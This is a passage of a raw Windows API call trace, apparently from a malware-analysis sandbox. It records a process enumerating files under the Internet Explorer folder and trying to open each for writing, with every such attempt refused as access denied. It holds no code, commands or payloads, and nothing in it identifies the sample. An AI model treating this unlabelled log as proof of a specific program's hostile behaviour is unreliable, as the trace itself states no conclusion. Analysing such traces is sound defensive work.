dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0089.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0089.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned 56 [0089.505] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.506] GetFileType (hFile=0x418) returned 0x1 [0089.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0089.507] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.507] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.507] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.507] CloseHandle (hObject=0x418) returned 1 [0089.507] AreFileApisANSI () returned 1 [0089.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0089.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0089.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned 56 [0089.507] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.507] GetLastError () returned 0x5 [0089.507] GetLastError () returned 0x5 [0089.507] SetLastError (dwErrCode=0x5) [0089.507] GetLastError () returned 0x5 [0089.508] SetLastError (dwErrCode=0x5) [0089.508] GetLastError () returned 0x5 [0089.508] SetLastError (dwErrCode=0x5) [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0089.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.508] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b3c4cb5, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x75fdf500, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0089.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0089.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0089.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0089.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0089.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0089.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0089.509] AreFileApisANSI () returned 1 [0089.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui", lpUsedDefaultChar=0x0) returned 58 [0089.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0089.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.509] AreFileApisANSI () returned 1 [0089.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0089.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0089.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned 58 [0089.509] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.510] GetFileType (hFile=0x418) returned 0x1 [0089.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0089.510] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.510] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.511] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.511] CloseHandle (hObject=0x418) returned 1 [0089.511] AreFileApisANSI () returned 1 [0089.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0089.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0089.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned 58 [0089.511] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.511] GetLastError () returned 0x5 [0089.511] GetLastError () returned 0x5 [0089.511] SetLastError (dwErrCode=0x5) [0089.511] GetLastError () returned 0x5 [0089.511] SetLastError (dwErrCode=0x5) [0089.511] GetLastError () returned 0x5 [0089.511] SetLastError (dwErrCode=0x5) [0089.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0089.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.511] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2212c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x74ccc800, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0089.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a958 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0089.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0089.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0089.512] AreFileApisANSI () returned 1 [0089.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui", lpUsedDefaultChar=0x0) returned 58 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0089.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0089.513] AreFileApisANSI () returned 1 [0089.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0089.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a9b0 [0089.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui") returned 58 [0089.513] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.514] GetFileType (hFile=0x418) returned 0x1 [0089.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0089.514] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.514] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.514] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.514] CloseHandle (hObject=0x418) returned 1 [0089.515] AreFileApisANSI () returned 1 [0089.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0089.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0089.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui") returned 58 [0089.515] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.515] GetLastError () returned 0x5 [0089.515] GetLastError () returned 0x5 [0089.515] SetLastError (dwErrCode=0x5) [0089.515] GetLastError () returned 0x5 [0089.515] SetLastError (dwErrCode=0x5) [0089.515] GetLastError () returned 0x5 [0089.515] SetLastError (dwErrCode=0x5) [0089.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.515] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x72, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6ebe8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x72, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="US", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ᘀ")) returned 0 [0089.516] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0089.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.517] AreFileApisANSI () returned 1 [0089.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\ExtExport.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\ExtExport.exe", lpUsedDefaultChar=0x0) returned 49 [0089.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0089.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.517] InitOnceExecuteOnce (in: 